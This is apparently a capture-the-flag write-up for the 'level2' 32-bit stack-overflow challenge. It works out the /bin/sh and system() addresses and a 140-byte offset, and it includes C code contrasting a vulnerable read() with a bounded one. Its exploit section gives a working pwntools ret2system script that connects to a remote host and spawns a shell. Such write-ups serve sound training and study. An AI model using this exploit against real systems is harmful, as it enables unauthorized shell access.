level2--writeup

File download:

Link: https://pan.baidu.com/s/1jiR84G8Ji3luscmYTOOKAA
Extraction code: jz7n

0x01. Analysis

checksec:

32-bit program, NX enabled.

Source:

The program calls system(), but its argument is not /bin/sh. The read() that follows has a stack overflow, so the next step is to check whether the binary contains the string /bin/sh:

It does.

Get the address of /bin/sh, and finally determine the offset:

For some reason this program does not exit gdb normally (possibly because of the system() call; the exact cause is unclear), so we compute the offset by hand:

It should be 0x88 - 0 + 4 = 140 (the 0 is the buffer's offset from esp in this example, and the saved ebp takes 4 bytes).
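The overflow described above comes from a read() whose length is not tied to the size of the stack buffer it fills. The following C is an added example, not the level2 source: it shows that vulnerable pattern next to a bounded form, and a helper that truncates oversized input so a practitioner can verify the fix offline. The buffer size (0x88) and the read length (0x100) are assumptions chosen for illustration, not values taken from the challenge binary.

```c
/* Added example (not the level2 source): a fixed-size stack buffer filled
 * by a read() whose length exceeds the buffer, beside the bounded form.
 * BUF_SIZE and the 0x100 read length are constructed for illustration. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x88   /* assumed: a 136-byte local buffer */

/* Vulnerable pattern (CWE-121): the read length (0x100) is larger than
 * the buffer, so input longer than BUF_SIZE overwrites the saved ebp and
 * the return address that sit above buf on the stack. Never called here. */
ssize_t vulnerable_read(void)
{
    char buf[BUF_SIZE];
    return read(0, buf, 0x100);   /* BUG: length not derived from sizeof(buf) */
}

/* Hardened pattern: the read length is derived from the buffer size and
 * room is kept for a terminating NUL. */
ssize_t safe_read(void)
{
    char buf[BUF_SIZE];
    ssize_t n = read(0, buf, sizeof(buf) - 1);
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

/* Same bound applied to an in-memory input so it can be exercised without
 * stdin: copies at most dst_size-1 bytes, NUL-terminates, and returns the
 * number of bytes stored, or -1 on invalid arguments. */
long bounded_copy(char *dst, size_t dst_size, const char *src, size_t src_len)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t n = src_len < dst_size - 1 ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (long)n;
}

/* Feeds a constructed 200-byte input (longer than the buffer) through
 * bounded_copy and returns how many bytes were actually stored. */
long demo_truncation(void)
{
    char input[200];
    char buf[BUF_SIZE];
    memset(input, 'A', sizeof(input));          /* constructed oversized input */
    return bounded_copy(buf, sizeof(buf), input, sizeof(input));
}

int main(void)
{
    long stored = demo_truncation();
    printf("input of 200 bytes, stored %ld bytes (buffer is %d)\n",
           stored, BUF_SIZE);
    return 0;
}
```

The point of bounded_copy is that the limit is taken from the destination's size, not from the caller's idea of how much data is coming; the 200-byte input is cut to 135 bytes plus the terminator instead of spilling over the saved frame.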

0x02. exp

#!/usr/bin/env python
from pwn import *
r = remote("111.198.29.45", 47065)
# r = process('./level2')

system_adr = 0x08048320   # address of system in the binary
bin_sh_adr = 0x0804A024   # address of the "/bin/sh" string

# 140 bytes of padding to reach the return address, then the address of
# system, a dummy return address for system, and the pointer to "/bin/sh".
# Bytes literals keep this working on both Python 2 and Python 3 pwntools.
payload = b'A' * 140 + p32(system_adr) + p32(0) + p32(bin_sh_adr)

r.recvuntil(b":")
r.sendline(payload)
r.interactive()


Origin blog.csdn.net/ATFWUS/article/details/104592491